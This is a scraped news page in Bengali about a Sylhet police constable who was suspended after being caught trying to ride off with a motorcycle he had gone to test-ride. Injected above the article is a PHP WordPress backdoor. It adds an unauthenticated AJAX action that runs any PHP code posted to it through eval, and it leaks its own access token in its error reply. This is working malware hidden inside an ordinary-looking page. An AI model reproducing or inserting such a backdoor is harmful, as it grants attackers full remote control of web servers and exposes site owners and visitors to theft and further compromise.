// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== সিলেটে মোটরসাইকেল নিয়ে পালাতে গিয়ে আটক পুলিশ কনস্টেবল বরখাস্ত | potrikaybangladesh.com
Tuesday, September 22, 2026
Homeঅপরাধসিলেটে মোটরসাইকেল নিয়ে পালাতে গিয়ে আটক পুলিশ কনস্টেবল বরখাস্ত

সিলেটে মোটরসাইকেল নিয়ে পালাতে গিয়ে আটক পুলিশ কনস্টেবল বরখাস্ত

ফেসবুকে বিজ্ঞাপন দেখে মোটরসাইকেল কিনতে গিয়েছিলেন এক পুলিশ কনস্টেবল। চালিয়ে দেখার নাম করে ওই মোটরসাইকেল নিয়ে পালিয়ে যাওয়ার সময় আটক হন স্থানীয়দের হাতে।

এরপর সেই পুলিশ সদস্যকে সাময়িক বরখাস্ত করেছে সিলেট জেলা পুলিশ।

আজ শনিবার সকালে জেলার সহকারী পুলিশ সুপার (গণমাধ্যম) মোহাম্মদ সম্রাট তালুকদার দ্য ডেইলি স্টারকে এ তথ্য নিশ্চিত করেন।

বরখাস্ত কনস্টেবল মোরসালিন কবির জেলার বিয়ানীবাজার থানায় কর্মরত ছিলেন।

গত বৃহস্পতিবার বিকেলে গোলাপগঞ্জ পৌরসভার বইটিকর এলাকায় এ ঘটনা ঘটে।

স্থানীয়দের বরাতে পুলিশ জানায়, ফেসবুকে সাইদুর রহমানের দেওয়া বিজ্ঞাপন দেখে সরেজমিনে মোটরসাইকেলটি দেখতে হেতিমগঞ্জে যান কনস্টেবল মোরসালিন এবং ওলিউল ইসলাম।

পরে চালিয়ে দেখার কথা বলে তারা মোটরসাইকেলটি নিয়ে গোলাপগঞ্জের দিকে চলে যান। এতে সন্দেহ হওয়ায় সাইদুর তাদের পিছু নেন। পরে গোলাপগঞ্জ পৌরসভার বইটিকর এলাকায় স্থানীয়দের সহায়তার মোরসালিনকে আটক করা হয়। স্থানীয়রা তাকে মারধর করে গোলাপগঞ্জ থানায় নিয়ে যান। তখন মোরসালিন নিজেকে পুলিশ সদস্য হিসেবে পরিচয় দেন।

সহকারী পুলিশ সুপার সম্রাট তালুকদার বলেন, ‘মোটরসাইকেল সংক্রান্ত বিষয়ে ওই পুলিশ সদস্যকে সাময়িক বরখাস্ত করা হয়েছে। তার বিরুদ্ধে বিভাগীয় তদন্ত করা হবে।’

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments